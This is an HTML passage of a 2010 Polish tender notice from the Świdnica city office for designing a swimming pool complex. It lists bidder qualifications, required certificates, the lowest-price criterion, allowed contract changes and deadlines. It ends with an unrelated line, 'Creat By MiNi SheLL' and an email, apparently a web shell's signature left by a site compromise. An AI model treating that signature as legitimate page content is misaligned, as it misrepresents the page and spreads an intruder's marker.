<ul class="kh_indent_1"><li><p>Wykonawca wykaże się opracowaniem co najmniej dwóch projektów budowlanych i wykonawczych (lub budowlano-wykonawczych) wykonanym przez Wykonawcę lub przy realizacji, którego pracował projek-tant wiodący(osoba odpowiedzialna za poszczególne etapy prac projektowych) przewidziany przez Wykonawcę do uczestnictwa przy realizacji niniejszego zamówienia w okresie ostatnich trzech lat przed dniem wszczęcia postępowania, ze względu na specyfikę przedmiotu zamówienia, a jeśli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wyko-nania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że usługi te zostały wykonane na-leżycie; 
- powyższe winno mieć zastosowanie dla jednego projektu kompleksu basenowego o łącznej powierzchni lustra wody nie mniejszej niż 900 m2;  
- wykazanie, że jeden z powyższych projektów posiada cechy obiektu energooszczędnego tj. ma speł-niać warunek posiadania parametru 90 kwh/m2/rok;
- wykazanie, że osoby, które będą uczestniczyły jako projektanci wiodący w wykonaniu zamówienia, peł-niły co najmniej jeden nadzór autorski dla obiektów przez siebie zaprojektowanych, których realizacja została zakończona.
Wykaz należy sporządzić wg wzoru, który stanowi załącznik nr 4 do SIWZ wraz z dokumentami potwier-dzającymi, że prace te zostały wykonane należycie(np. protokoły odbioru dokumentacji projektowej, re-ferencje, kopie pozwolenia na budowę)- załącznik nr 7 do oferty
Ocena zostanie dokonana wg formuły spełnia - nie spełnia na podstawie oświadczeń i dokumentów, o których mowa w rozdziale 7 i 8  specyfikacji</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dysponuje lub będzie dysponował osobami, które będą uczestniczyć w wykonywaniu za-mówienia wraz z informacjami o ich kwalifikacjach zawodowych, doświadczeniu i wykształceniu, nie-zbędnych do wykonania zamówienia, a także zakresie wykonywanych przez nich czynności, oraz in-formacją o podstawie do dysponowania tymi osobami;
Wykonawca dla udowodnienia powyższego warunku zobowiązany jest do wskazania zespołów projek-towych z osobami , które pełnić będą funkcję projektanta/ projektantów wiodących. W przypadku podania kilku projektantów wiodących wskazać należy dodatkowo projektanta odpowiadającego za koordynacją poszczególnych etapów prac projektu. 
Osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane Prawem Budowlanym uprawnienia do projektowania i sprawdzania projektów w specjalnościach wymaganych przez specyfikę przedmiotu zamówienia i tym samym umożliwiających wykonanie przedmiotu zamówienia. Osoby przewidziane do pełnienia funkcji projektantów posiadają uprawnienia budowlane do projektowania w odpowiednich specjalnościach:
- architektonicznej;
- konstrukcyjno-budowlanej,
- drogowej,
- instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodocią-gowych i kanalizacyjnych;
- instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych,
    - oraz innych
Ocena zostanie dokonana wg formuły spełnia - nie spełnia na podstawie oświadczeń i dokumentów, o których mowa w rozdziale 7 i 8  specyfikacji</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca posiada ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności projektowej na sumę ubezpieczenia co najmniej 500.000,00 zł .
Ocena zostanie dokonana wg formuły spełnia - nie spełnia na podstawie oświadczeń i dokumentów, o których mowa w rozdziale 7 i 8  specyfikacji</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- zaparafowany projekt umowy - załącznik nr 12 do oferty,
- dowód wniesienia wadium - załącznik nr 1 do oferty,
- pełnomocnictwo do działania w imieniu Wykonawcy w przypadku, gdy nie jest to osoba upoważniona do reprezentowania Wykonawcy z mocy prawa - załącznik nr 13 do oferty,
- w przypadku osób fizycznych aktualny wpis do ewidencji działalności gospodarczej- załącznik nr 15 do oferty,
- do oferty winien być załączony dokument(y) z którego wynika upoważnienie dla osoby składającej i podpisującej ofertę.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>. Zmiana umowy dotyczyć może:
a)  zmiany wynikającej z warunków lub decyzji wydanych przez organy administracji państwowej lub samorządowej, ze zmiany przepisów bądź wymogów szczególnych dotyczących inwestycji objętych przedmiotem zamówienia, w tym przepisów i wymogów stawianych dokumentom niezbędnym do przedłożenia przy składaniu wniosków o dofinansowanie inwestycji oraz,
b)  zmiany terminu wykonania prac projektowych; związanych ze zmianą zakresu prac (przedmiotu zamówienia) jw. lub z przyczyn nie leżących po stronie Wykonawcy,
c)  zmiany kluczowego personelu Wykonawcy,
d)  zmiany podwykonawców,
e)  zmiany stawki podatku VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.swidnica.bip-gov.info.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w  Świdnicy, ul. Armii Krajowej 49, Miejskie  Biuro Przetargów - pokój nr 124.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.05.2010 godzina 09:00, miejsce: Urząd Miejski w  Świdnicy, ul. Armii Krajowej 49, Miejskie  Biuro Przetargów - pokój nr 124.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com